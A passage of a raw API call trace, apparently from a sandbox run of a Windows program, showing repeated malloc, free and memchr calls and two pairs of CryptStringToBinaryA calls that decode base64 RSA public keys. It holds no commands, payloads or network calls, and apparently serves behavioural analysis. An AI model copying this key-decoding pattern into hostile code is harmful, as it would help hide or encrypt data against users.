(_Size=0xe) returned 0x3648ed8 [0135.872] free (_Block=0x0) [0135.872] free (_Block=0x0) [0135.872] memchr (_Buf=0x60674d, _Val=32, _MaxCount=0x13) returned 0x606756 [0135.872] malloc (_Size=0xa) returned 0x3648ef0 [0135.872] free (_Block=0x0) [0135.872] free (_Block=0x0) [0135.872] memchr (_Buf=0x606757, _Val=32, _MaxCount=0x9) returned 0x0 [0135.872] malloc (_Size=0xa) returned 0x3648f38 [0135.872] free (_Block=0x0) [0135.872] free (_Block=0x0) [0135.872] free (_Block=0x3f4bfa8) [0135.872] free (_Block=0x3648de8) [0135.872] free (_Block=0x3648f20) [0135.872] free (_Block=0x3648c68) [0135.872] free (_Block=0x3648d88) [0135.872] free (_Block=0x3648da0) [0135.872] free (_Block=0x3648e00) [0135.873] free (_Block=0x3648ea8) [0135.873] free (_Block=0x3648cc8) [0135.873] free (_Block=0x3648ec0) [0135.873] free (_Block=0x3648ed8) [0135.873] free (_Block=0x3648ef0) [0135.873] free (_Block=0x3648f38) [0135.873] free (_Block=0x3dd4648) [0135.873] memchr (_Buf=0x3d803c8, _Val=32, _MaxCount=0x1d) returned 0x3d803d1 [0135.873] malloc (_Size=0xa) returned 0x3648ea8 [0135.873] free (_Block=0x0) [0135.873] malloc (_Size=0x40) returned 0x3e22080 [0135.873] free (_Block=0x0) [0135.873] free (_Block=0x0) [0135.873] memchr (_Buf=0x3d803d2, _Val=32, _MaxCount=0x13) returned 0x3d803dc [0135.873] malloc (_Size=0xb) returned 0x3648de8 [0135.873] free (_Block=0x0) [0135.874] free (_Block=0x0) [0135.875] memchr (_Buf=0x3d803dd, _Val=32, _MaxCount=0x8) returned 0x0 [0135.875] malloc (_Size=0x9) returned 0x3648f38 [0135.875] free (_Block=0x0) [0135.875] free (_Block=0x0) [0135.875] free (_Block=0x3648ea8) [0135.875] free (_Block=0x3648de8) [0135.875] free (_Block=0x3648f38) [0135.875] free (_Block=0x3e22080) [0135.875] memchr (_Buf=0x3e22278, _Val=32, _MaxCount=0x3d) returned 0x3e22283 [0135.875] malloc (_Size=0xc) returned 0x3648c68 [0135.875] free (_Block=0x0) [0135.875] malloc (_Size=0x40) returned 0x3e22308 [0135.875] free (_Block=0x0) [0135.875] free (_Block=0x0) [0135.875] memchr (_Buf=0x3e22284, _Val=32, _MaxCount=0x31) returned 0x3e22288 [0135.875] malloc (_Size=0x5) returned 0x3f4bf28 [0135.875] free (_Block=0x0) [0135.875] free (_Block=0x0) [0135.875] memchr (_Buf=0x3e22289, _Val=32, _MaxCount=0x2c) returned 0x3e2228d [0135.875] malloc (_Size=0x5) returned 0x3f4c0b8 [0135.875] free (_Block=0x0) [0135.875] free (_Block=0x0) [0135.875] memchr (_Buf=0x3e2228e, _Val=32, _MaxCount=0x27) returned 0x3e22292 [0135.875] malloc (_Size=0x5) returned 0x3f4c038 [0135.876] free (_Block=0x0) [0135.876] free (_Block=0x0) [0135.876] memchr (_Buf=0x3e22293, _Val=32, _MaxCount=0x22) returned 0x3e22297 [0135.876] malloc (_Size=0x5) returned 0x3f4c028 [0135.876] free (_Block=0x0) [0135.876] malloc (_Size=0x140) returned 0x3dd4790 [0135.876] free (_Block=0x3e22308) [0135.876] free (_Block=0x0) [0135.876] memchr (_Buf=0x3e22298, _Val=32, _MaxCount=0x1d) returned 0x3e2229c [0135.876] malloc (_Size=0x5) returned 0x3f4bf68 [0135.876] free (_Block=0x0) [0135.876] free (_Block=0x0) [0135.876] memchr (_Buf=0x3e2229d, _Val=32, _MaxCount=0x18) returned 0x3e222a1 [0135.876] malloc (_Size=0x5) returned 0x3f4bf98 [0135.876] free (_Block=0x0) [0135.876] free (_Block=0x0) [0135.876] memchr (_Buf=0x3e222a2, _Val=32, _MaxCount=0x13) returned 0x3e222a6 [0135.876] malloc (_Size=0x5) returned 0x3f4bf58 [0135.876] free (_Block=0x0) [0135.876] free (_Block=0x0) [0135.876] memchr (_Buf=0x3e222a7, _Val=32, _MaxCount=0xe) returned 0x3e222ab [0135.876] malloc (_Size=0x5) returned 0x3f4bfd8 [0135.877] free (_Block=0x0) [0135.877] free (_Block=0x0) [0135.877] memchr (_Buf=0x3e222ac, _Val=32, _MaxCount=0x9) returned 0x3e222b0 [0135.877] malloc (_Size=0x5) returned 0x3f4bf88 [0135.877] free (_Block=0x0) [0135.877] free (_Block=0x0) [0135.877] memchr (_Buf=0x3e222b1, _Val=32, _MaxCount=0x4) returned 0x0 [0135.877] malloc (_Size=0x5) returned 0x3f4c0d8 [0135.877] free (_Block=0x0) [0135.877] free (_Block=0x0) [0135.877] free (_Block=0x3648c68) [0135.877] free (_Block=0x3f4bf28) [0135.877] free (_Block=0x3f4c0b8) [0135.877] free (_Block=0x3f4c038) [0135.877] free (_Block=0x3f4c028) [0135.877] free (_Block=0x3f4bf68) [0135.877] free (_Block=0x3f4bf98) [0135.877] free (_Block=0x3f4bf58) [0135.877] free (_Block=0x3f4bfd8) [0135.877] free (_Block=0x3f4bf88) [0135.877] free (_Block=0x3f4c0d8) [0135.877] free (_Block=0x3dd4790) [0135.877] memchr (_Buf=0x3648ce0, _Val=32, _MaxCount=0xd) returned 0x3648ce6 [0135.877] malloc (_Size=0x7) returned 0x3f4bf48 [0135.877] free (_Block=0x0) [0135.878] malloc (_Size=0x40) returned 0x3e22080 [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x0) [0135.878] memchr (_Buf=0x3648ce7, _Val=32, _MaxCount=0x6) returned 0x0 [0135.878] malloc (_Size=0x7) returned 0x3f4bfd8 [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x3f4bf48) [0135.878] free (_Block=0x3f4bfd8) [0135.878] free (_Block=0x3e22080) [0135.878] memchr (_Buf=0x60de28, _Val=32, _MaxCount=0x27) returned 0x60de31 [0135.878] malloc (_Size=0xa) returned 0x3648ea8 [0135.878] free (_Block=0x0) [0135.878] malloc (_Size=0x40) returned 0x3e22500 [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x0) [0135.878] memchr (_Buf=0x60de32, _Val=32, _MaxCount=0x1d) returned 0x60de3c [0135.878] malloc (_Size=0xb) returned 0x3648ec0 [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x0) [0135.878] memchr (_Buf=0x60de3d, _Val=32, _MaxCount=0x12) returned 0x60de47 [0135.878] malloc (_Size=0xb) returned 0x3648ed8 [0135.878] free (_Block=0x0) [0135.878] free (_Block=0x0) [0135.878] memchr (_Buf=0x60de48, _Val=32, _MaxCount=0x7) returned 0x0 [0135.878] malloc (_Size=0x8) returned 0x3f4bfd8 [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x3648ea8) [0135.879] free (_Block=0x3648ec0) [0135.879] free (_Block=0x3648ed8) [0135.879] free (_Block=0x3f4bfd8) [0135.879] free (_Block=0x3e22500) [0135.879] memchr (_Buf=0x60b1c0, _Val=32, _MaxCount=0x66) returned 0x60b1d1 [0135.879] malloc (_Size=0x12) returned 0x3f654e0 [0135.879] free (_Block=0x0) [0135.879] malloc (_Size=0x40) returned 0x3e22620 [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x0) [0135.879] memchr (_Buf=0x60b1d2, _Val=32, _MaxCount=0x54) returned 0x60b1fa [0135.879] malloc (_Size=0x29) returned 0x36248e0 [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x0) [0135.879] memchr (_Buf=0x60b1fb, _Val=32, _MaxCount=0x2b) returned 0x0 [0135.879] malloc (_Size=0x2c) returned 0x3624a30 [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x0) [0135.879] free (_Block=0x3f654e0) [0135.879] free (_Block=0x36248e0) [0135.879] free (_Block=0x3624a30) [0135.880] free (_Block=0x3e22620) [0135.880] memchr (_Buf=0x3648cf8, _Val=32, _MaxCount=0x9) returned 0x0 [0135.880] malloc (_Size=0xa) returned 0x3648ef0 [0135.880] free (_Block=0x0) [0135.880] malloc (_Size=0x40) returned 0x3e22470 [0135.880] free (_Block=0x0) [0135.880] free (_Block=0x0) [0135.880] free (_Block=0x3648ef0) [0135.880] free (_Block=0x3e22470) [0135.880] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x1e) returned 0x3d8008a [0135.880] malloc (_Size=0xb) returned 0x3648ea8 [0135.880] free (_Block=0x0) [0135.880] malloc (_Size=0x40) returned 0x3e224b8 [0135.880] free (_Block=0x0) [0135.880] free (_Block=0x0) [0135.880] memchr (_Buf=0x3d8008b, _Val=32, _MaxCount=0x13) returned 0x3d8008e [0135.880] malloc (_Size=0x4) returned 0x3f4bf58 [0135.880] free (_Block=0x0) [0135.880] free (_Block=0x0) [0135.880] memchr (_Buf=0x3d8008f, _Val=32, _MaxCount=0xf) returned 0x3d80095 [0135.880] malloc (_Size=0x7) returned 0x3f4c018 [0135.880] free (_Block=0x0) [0135.880] free (_Block=0x0) [0135.880] memchr (_Buf=0x3d80096, _Val=32, _MaxCount=0x8) returned 0x0 [0135.881] malloc (_Size=0x9) returned 0x3648d88 [0135.881] free (_Block=0x0) [0135.881] free (_Block=0x0) [0135.881] free (_Block=0x3648ea8) [0135.881] free (_Block=0x3f4bf58) [0135.881] free (_Block=0x3f4c018) [0135.881] free (_Block=0x3648d88) [0135.881] free (_Block=0x3e224b8) [0135.881] memchr (_Buf=0x3defd10, _Val=32, _MaxCount=0x40) returned 0x0 [0135.881] malloc (_Size=0x41) returned 0x3deff90 [0135.881] free (_Block=0x0) [0135.881] malloc (_Size=0x40) returned 0x3e22548 [0135.881] free (_Block=0x0) [0135.881] free (_Block=0x0) [0135.881] malloc (_Size=0x41) returned 0x3defa90 [0135.881] free (_Block=0x0) [0135.881] free (_Block=0x3deff90) [0135.881] free (_Block=0x3e22548) [0135.881] memchr (_Buf=0x3df0080, _Val=32, _MaxCount=0x40) returned 0x0 [0135.881] malloc (_Size=0x41) returned 0x3defa40 [0135.881] free (_Block=0x0) [0135.881] malloc (_Size=0x40) returned 0x3e22668 [0135.881] free (_Block=0x0) [0135.882] free (_Block=0x0) [0135.882] malloc (_Size=0x81) returned 0x60c800 [0135.882] free (_Block=0x3defa90) [0135.882] free (_Block=0x3defa40) [0135.882] free (_Block=0x3e22668) [0135.882] memchr (_Buf=0x3e22788, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.882] malloc (_Size=0x3d) returned 0x3e22428 [0135.882] free (_Block=0x0) [0135.882] malloc (_Size=0x40) returned 0x3e22308 [0135.882] free (_Block=0x0) [0135.882] free (_Block=0x0) [0135.882] malloc (_Size=0xc1) returned 0x605a18 [0135.882] free (_Block=0x60c800) [0135.882] free (_Block=0x3e22428) [0135.882] free (_Block=0x3e22308) [0135.882] memchr (_Buf=0x3d80328, _Val=32, _MaxCount=0x1c) returned 0x3d80330 [0135.882] malloc (_Size=0x9) returned 0x3648c68 [0135.882] free (_Block=0x0) [0135.882] malloc (_Size=0x40) returned 0x3e22470 [0135.882] free (_Block=0x0) [0135.882] free (_Block=0x0) [0135.882] memchr (_Buf=0x3d80331, _Val=32, _MaxCount=0x13) returned 0x3d80334 [0135.882] malloc (_Size=0x4) returned 0x3f4bfc8 [0135.883] free (_Block=0x0) [0135.883] free (_Block=0x0) [0135.883] memchr (_Buf=0x3d80335, _Val=32, _MaxCount=0xf) returned 0x3d8033b [0135.883] malloc (_Size=0x7) returned 0x3f4bf58 [0135.883] free (_Block=0x0) [0135.883] free (_Block=0x0) [0135.883] memchr (_Buf=0x3d8033c, _Val=32, _MaxCount=0x8) returned 0x0 [0135.883] malloc (_Size=0x9) returned 0x3648d88 [0135.883] free (_Block=0x0) [0135.883] free (_Block=0x0) [0135.883] CryptStringToBinaryA (in: pszString="MIGJAoGBAOQa+K7B29nP6iCTComYzdOD1pSMq/49gnCZZ05awnv6O94XDE5ITMYVWszyO7bjcfrigz3GTXJbla9cox2sA5wuGQqh/iikTDfFD8HMtaS0p5IZIDvMzNKcFotHRLJfrJlMS2qiNQFGabvaYA2Mvd7nfAg9s28crSCj65OZVXPxAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.883] malloc (_Size=0x8c) returned 0x3d80460 [0135.883] free (_Block=0x0) [0135.883] CryptStringToBinaryA (in: pszString="MIGJAoGBAOQa+K7B29nP6iCTComYzdOD1pSMq/49gnCZZ05awnv6O94XDE5ITMYVWszyO7bjcfrigz3GTXJbla9cox2sA5wuGQqh/iikTDfFD8HMtaS0p5IZIDvMzNKcFotHRLJfrJlMS2qiNQFGabvaYA2Mvd7nfAg9s28crSCj65OZVXPxAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d80460, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d80460, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.883] malloc (_Size=0x8c) returned 0x3d815c8 [0135.883] free (_Block=0x0) [0135.883] free (_Block=0x0) [0135.883] free (_Block=0x3d80460) [0135.883] free (_Block=0x3648c68) [0135.883] free (_Block=0x3f4bfc8) [0135.883] free (_Block=0x3f4bf58) [0135.883] free (_Block=0x3648d88) [0135.884] free (_Block=0x3e22470) [0135.884] memchr (_Buf=0x3648e18, _Val=32, _MaxCount=0xb) returned 0x0 [0135.884] malloc (_Size=0xc) returned 0x3648e00 [0135.884] free (_Block=0x0) [0135.884] malloc (_Size=0x40) returned 0x3e22110 [0135.884] free (_Block=0x0) [0135.884] free (_Block=0x0) [0135.884] free (_Block=0x3648e00) [0135.884] free (_Block=0x3e22110) [0135.884] memchr (_Buf=0x3d80210, _Val=32, _MaxCount=0x1e) returned 0x3d8021a [0135.884] malloc (_Size=0xb) returned 0x3648ec0 [0135.884] free (_Block=0x0) [0135.884] malloc (_Size=0x40) returned 0x3e22080 [0135.884] free (_Block=0x0) [0135.884] free (_Block=0x0) [0135.884] memchr (_Buf=0x3d8021b, _Val=32, _MaxCount=0x13) returned 0x3d8021e [0135.884] malloc (_Size=0x4) returned 0x3f4bfd8 [0135.884] free (_Block=0x0) [0135.884] free (_Block=0x0) [0135.884] memchr (_Buf=0x3d8021f, _Val=32, _MaxCount=0xf) returned 0x3d80225 [0135.884] malloc (_Size=0x7) returned 0x3f4c018 [0135.884] free (_Block=0x0) [0135.884] free (_Block=0x0) [0135.884] memchr (_Buf=0x3d80226, _Val=32, _MaxCount=0x8) returned 0x0 [0135.885] malloc (_Size=0x9) returned 0x3648cc8 [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x3648ec0) [0135.885] free (_Block=0x3f4bfd8) [0135.885] free (_Block=0x3f4c018) [0135.885] free (_Block=0x3648cc8) [0135.885] free (_Block=0x3e22080) [0135.885] memchr (_Buf=0x3deffe0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.885] malloc (_Size=0x41) returned 0x3defc70 [0135.885] free (_Block=0x0) [0135.885] malloc (_Size=0x40) returned 0x3e22398 [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x3defc70) [0135.885] free (_Block=0x3e22398) [0135.885] memchr (_Buf=0x3defcc0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.885] malloc (_Size=0x41) returned 0x3defe50 [0135.885] free (_Block=0x0) [0135.885] malloc (_Size=0x40) returned 0x3e220c8 [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x0) [0135.885] free (_Block=0x3defe50) [0135.886] free (_Block=0x3e220c8) [0135.886] memchr (_Buf=0x3e222c0, _Val=32, _MaxCount=0x3c) returned 0x0 [0135.886] malloc (_Size=0x3d) returned 0x3e22428 [0135.886] free (_Block=0x0) [0135.886] malloc (_Size=0x40) returned 0x3e224b8 [0135.886] free (_Block=0x0) [0135.886] free (_Block=0x0) [0135.886] free (_Block=0x3e22428) [0135.886] free (_Block=0x3e224b8) [0135.886] memchr (_Buf=0x3d803f0, _Val=32, _MaxCount=0x1c) returned 0x3d803f8 [0135.886] malloc (_Size=0x9) returned 0x3648f08 [0135.886] free (_Block=0x0) [0135.886] malloc (_Size=0x40) returned 0x3e22428 [0135.886] free (_Block=0x0) [0135.886] free (_Block=0x0) [0135.886] memchr (_Buf=0x3d803f9, _Val=32, _MaxCount=0x13) returned 0x3d803fc [0135.886] malloc (_Size=0x4) returned 0x3f4bfe8 [0135.886] free (_Block=0x0) [0135.886] free (_Block=0x0) [0135.886] memchr (_Buf=0x3d803fd, _Val=32, _MaxCount=0xf) returned 0x3d80403 [0135.886] malloc (_Size=0x7) returned 0x3f4bf58 [0135.886] free (_Block=0x0) [0135.887] free (_Block=0x0) [0135.887] memchr (_Buf=0x3d80404, _Val=32, _MaxCount=0x8) returned 0x0 [0135.887] malloc (_Size=0x9) returned 0x3648ea8 [0135.887] free (_Block=0x0) [0135.887] free (_Block=0x0) [0135.887] CryptStringToBinaryA (in: pszString="MIGJAoGBAMdiy44V0l1a0e6BAYASXrjIn0dD2nO+AjpqVwYq2NSmF1XbTikpYrWVO916lMkBPEsRKA+nBOSuH7lck4OQmyihaOwgIMOnZP0ijfvnsRdXHXoIQlM66titb9cj+aLCLd4N+Oe7Uk9QJ/ZLGmUoZWgU3bG+enzZCyvGhLGZFaSBAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.887] malloc (_Size=0x8c) returned 0x3d81660 [0135.887] free (_Block=0x0) [0135.887] CryptStringToBinaryA (in: pszString="MIGJAoGBAMdiy44V0l1a0e6BAYASXrjIn0dD2nO+AjpqVwYq2NSmF1XbTikpYrWVO916lMkBPEsRKA+nBOSuH7lck4OQmyihaOwgIMOnZP0ijfvnsRdXHXoIQlM66titb9cj+aLCLd4N+Oe7Uk9QJ/ZLGmUoZWgU3bG+enzZCyvGhLGZFaSBAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d81660, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d81660, pcbBinary=0x339fa98, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0135.887] malloc (_Size=0x8c) returned 0x3d80460 [0135.887] free (_Block=0x0) [0135.887] free (_Block=0x0) [0135.887] free (_Block=0x3d81660) [0135.887] free (_Block=0x3648f08) [0135.887] free (_Block=0x3f4bfe8) [0135.887] free (_Block=0x3f4bf58) [0135.887] free (_Block=0x3648ea8) [0135.887] free (_Block=0x3e22428) [0135.887] memchr (_Buf=0x3f65300, _Val=32, _MaxCount=0x13) returned 0x0 [0135.887] malloc (_Size=0x14) returned 0x3f653e0 [0135.887] free (_Block=0x0) [0135.888] malloc (_Size=0x40) returned 0x3e22080 [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x3f653e0) [0135.888] free (_Block=0x3e22080) [0135.888] memchr (_Buf=0x3d802d8, _Val=32, _MaxCount=0x19) returned 0x3d802e2 [0135.888] malloc (_Size=0xb) returned 0x3648c68 [0135.888] free (_Block=0x0) [0135.888] malloc (_Size=0x40) returned 0x3e220c8 [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x0) [0135.888] memchr (_Buf=0x3d802e3, _Val=32, _MaxCount=0xe) returned 0x0 [0135.888] malloc (_Size=0xf) returned 0x3648ea8 [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x3648c68) [0135.888] free (_Block=0x3648ea8) [0135.888] free (_Block=0x3e220c8) [0135.888] memchr (_Buf=0x3deff40, _Val=32, _MaxCount=0x40) returned 0x0 [0135.888] malloc (_Size=0x41) returned 0x3defc70 [0135.888] free (_Block=0x0) [0135.888] malloc (_Size=0x40) returned 0x3e221e8 [0135.888] free (_Block=0x0) [0135.888] free (_Block=0x0) [0135.889] free (_Block=0x3defc70) [0135.889] free (_Block=0x3e221e8) [0135.889] memchr (_Buf=0x3defbd0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.889] malloc (_Size=0x41) returned 0x3defc70 [0135.889] free (_Block=0x0) [0135.889] malloc (_Size=0x40) returned 0x3e22080 [0135.889] free (_Block=0x0) [0135.889] free (_Block=0x0) [0135.889] free (_Block=0x3defc70) [0135.889] free (_Block=0x3e22080) [0135.892] memchr (_Buf=0x3624b10, _Val=32, _MaxCount=0x2c) returned 0x0 [0135.892] malloc (_Size=0x2d) returned 0x3624a30 [0135.892] free (_Block=0x0) [0135.892] malloc (_Size=0x40) returned 0x3e22080 [0135.893] free (_Block=0x0) [0135.893] free (_Block=0x0) [0135.893] free (_Block=0x3624a30) [0135.893] free (_Block=0x3e22080) [0135.893] memchr (_Buf=0x3f65280, _Val=32, _MaxCount=0x17) returned 0x3f65288 [0135.893] malloc (_Size=0x9) returned 0x3648ea8 [0135.893] free (_Block=0x0) [0135.893] malloc (_Size=0x40) returned 0x3e22308 [0135.893] free (_Block=0x0) [0135.893] free (_Block=0x0) [0135.893] memchr (_Buf=0x3f65289, _Val=32, _MaxCount=0xe) returned 0x0 [0135.893] malloc (_Size=0xf) returned 0x3648ec0 [0135.893] free (_Block=0x0) [0135.893] free (_Block=0x0) [0135.893] free (_Block=0x3648ea8) [0135.893] free (_Block=0x3648ec0) [0135.893] free (_Block=0x3e22308) [0135.893] memchr (_Buf=0x3d80300, _Val=32, _MaxCount=0x1a) returned 0x3d80318 [0135.894] malloc (_Size=0x19) returned 0x3d800f8 [0135.894] free (_Block=0x0) [0135.894] malloc (_Size=0x40) returned 0x3e22080 [0135.894] free (_Block=0x0) [0135.894] free (_Block=0x0) [0135.894] memchr (_Buf=0x3d80319, _Val=32, _MaxCount=0x1) returned 0x0 [0135.894] malloc (_Size=0x2) returned 0x3f4bf88 [0135.894] free (_Block=0x0) [0135.894] free (_Block=0x0) [0135.894] free (_Block=0x3d800f8) [0135.894] free (_Block=0x3f4bf88) [0135.894] free (_Block=0x3e22080) [0135.894] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x1c) returned 0x3d8026a [0135.894] malloc (_Size=0xb) returned 0x3648ea8 [0135.894] free (_Block=0x0) [0135.894] malloc (_Size=0x40) returned 0x3e221e8 [0135.894] free (_Block=0x0) [0135.894] free (_Block=0x0) [0135.895] memchr (_Buf=0x3d8026b, _Val=32, _MaxCount=0x11) returned 0x3d80272 [0135.895] malloc (_Size=0x8) returned 0x3f4bf98 [0135.895] free (_Block=0x0) [0135.895] free (_Block=0x0) [0135.895] memchr (_Buf=0x3d80273, _Val=32, _MaxCount=0x9) returned 0x0 [0135.895] malloc (_Size=0xa) returned 0x3648e00 [0135.895] free (_Block=0x0) [0135.895] free (_Block=0x0) [0135.895] free (_Block=0x3648ea8) [0135.895] free (_Block=0x3f4bf98) [0135.895] free (_Block=0x3648e00) [0135.895] free (_Block=0x3e221e8) [0135.895] memchr (_Buf=0x3defae0, _Val=32, _MaxCount=0x40) returned 0x0 [0135.895] malloc (_Size=0x41) returned 0x3deff90 [0135.895] free (_Block=0x0) [0135.895] malloc (_Size=0x40) returned 0x3e221a0 [0135.895] free (_Block=0x0) [0135.895] free (_Block=0x0) [0135.895] free (_Block=0x3deff90) [0135.895] free (_Block=0x3e221a0) [0135.895] memchr (_Buf=0x3def950, _Val=32, _MaxCount=0x40) returned 0x0 [0135.895] malloc (_Size=0x41) returned 0x3defc70 [0135.896] free (_Block=0x0) [0135.896] malloc (_Size=0x40) returned 0x3e22308 [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x3defc70) [0135.896] free (_Block=0x3e22308) [0135.896] memchr (_Buf=0x3648e90, _Val=32, _MaxCount=0xc) returned 0x0 [0135.896] malloc (_Size=0xd) returned 0x3648ea8 [0135.896] free (_Block=0x0) [0135.896] malloc (_Size=0x40) returned 0x3e226b0 [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x3648ea8) [0135.896] free (_Block=0x3e226b0) [0135.896] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1a) returned 0x3d800b0 [0135.896] malloc (_Size=0x9) returned 0x3648d88 [0135.896] free (_Block=0x0) [0135.896] malloc (_Size=0x40) returned 0x3e226b0 [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x0) [0135.896] memchr (_Buf=0x3d800b1, _Val=32, _MaxCount=0x11) returned 0x3d800b8 [0135.896] malloc (_Size=0x8) returned 0x3f4c038 [0135.896] free (_Block=0x0) [0135.896] free (_Block=0x0) [0135.897] memchr (_Buf=0x3d800b9, _Val=32, _MaxCount=0x9) returned 0x0 [0135.897] malloc (_Size=0xa) returned 0x3648ea8 [0135.897] free (_Block=0x0) [0135.897] free (_Block=0x0) [0135.897] free (_Block=0x3648d88) [0135.897] free (_Block=0x3f4c038) [0135.897] free (_Block=0x3648ea8) [0135.897] free (_Block=0x3e226b0) [0135.897] memchr (_Buf=0x3f68010, _Val=32, _MaxCount=0x106e) returned 0x3f68016 [0135.897] malloc (_Size=0x7) returned 0x3f4bf48 [0135.897] free (_Block=0x0) [0135.897] malloc (_Size=0x40) returned 0x3e22590 [0135.897] free (_Block=0x0) [0135.897] free (_Block=0x0) [0135.897] memchr (_Buf=0x3f68017, _Val=32, _MaxCount=0x1067) returned 0x3f68040 [0135.897] malloc (_Size=0x2a) returned 0x3624870 [0135.897] free (_Block=0x0) [0135.897] free (_Block=0x0) [0135.897] memchr (_Buf=0x3f68041, _Val=32, _MaxCount=0x103d) returned 0x3f6806a [0135.897] malloc (_Size=0x2a) returned 0x3624a30 [0135.897] free (_Block=0x0) [0135.897] free (_Block=0x0) [0135.897] memchr (_Buf=0x3f6806b, _Val=32, _MaxCount=0x1013) returned 0x3f68094 [0135.898] malloc (_Size=0x2a) returned 0x3624a68 [0135.898] free (_Block=0x0) [0135.898] free (_Block=0x0) [0135.898] memchr (_Buf=0x3f68095, _Val=32, _MaxCount=0xfe9) returned 0x3f680be [0135.898] malloc (_Size=0x2a) returned 0x3624988 [0135.898] free (_Block=0x0) [0135.898] malloc (_Size=0x140) returned 0x3dd48d8 [0135.898] free (_Block=0x3e22590) [0135.898] free (_Block=0x0) [0135.898] memchr (_Buf=0x3f680bf, _Val=32, _MaxCount=0xfbf) returned 0x3f680e8 [0135.898] malloc (_Size=0x2a) returned 0x3624aa0 [0135.898] free (_Block=0x0) [0135.898] free (_Block=0x0) [0135.898] memchr (_Buf=0x3f680e9, _Val=32, _MaxCount=0xf95) returned 0x3f68112 [0135.898] malloc (_Size=0x2a) returned 0x3624ad8 [0135.898] free (_Block=0x0) [0135.898] free (_Block=0x0) [0135.898] memchr (_Buf=0x3f68113, _Val=32, _MaxCount=0xf6b) returned 0x3f6813c [0135.898] malloc (_Size=0x2a) returned 0x3624b48 [0135.898] free (_Block=0x0) [0135.898] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f6813d, _Val=32, _MaxCount=0xf41) returned 0x3f68166 [0135.899] malloc (_Size=0x2a) returned 0x36248a8 [0135.899] free (_Block=0x0) [0135.899] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f68167, _Val=32, _MaxCount=0xf17) returned 0x3f68190 [0135.899] malloc (_Size=0x2a) returned 0x36249c0 [0135.899] free (_Block=0x0) [0135.899] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f68191, _Val=32, _MaxCount=0xeed) returned 0x3f681ba [0135.899] malloc (_Size=0x2a) returned 0x36248e0 [0135.899] free (_Block=0x0) [0135.899] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f681bb, _Val=32, _MaxCount=0xec3) returned 0x3f681e4 [0135.899] malloc (_Size=0x2a) returned 0x3624918 [0135.899] free (_Block=0x0) [0135.899] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f681e5, _Val=32, _MaxCount=0xe99) returned 0x3f6820e [0135.899] malloc (_Size=0x2a) returned 0x3624950 [0135.899] free (_Block=0x0) [0135.899] free (_Block=0x0) [0135.899] memchr (_Buf=0x3f6820f, _Val=32, _MaxCount=0xe6f) returned 0x3f68238 [0135.899] malloc (_Size=0x2a) returned 0x3624bb8 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.900] memchr (_Buf=0x3f68239, _Val=32, _MaxCount=0xe45) returned 0x3f68262 [0135.900] malloc (_Size=0x2a) returned 0x3624838 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.900] memchr (_Buf=0x3f68263, _Val=32, _MaxCount=0xe1b) returned 0x3f6828c [0135.900] malloc (_Size=0x2a) returned 0x3def580 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.900] memchr (_Buf=0x3f6828d, _Val=32, _MaxCount=0xdf1) returned 0x3f682b6 [0135.900] malloc (_Size=0x2a) returned 0x3def548 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.900] memchr (_Buf=0x3f682b7, _Val=32, _MaxCount=0xdc7) returned 0x3f682e0 [0135.900] malloc (_Size=0x2a) returned 0x3def120 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.900] memchr (_Buf=0x3f682e1, _Val=32, _MaxCount=0xd9d) returned 0x3f6830a [0135.900] malloc (_Size=0x2a) returned 0x3def510 [0135.900] free (_Block=0x0) [0135.900] free (_Block=0x0) [0135.901] memchr (_Buf=0x3f6830b, _Val=32, _MaxCount=0xd73) returned 0x3f68334 [0135.901] malloc (_Size=0x2a) returned 0x3def0e8 [0135.901] free (_Block=0x0) [0135.901] free 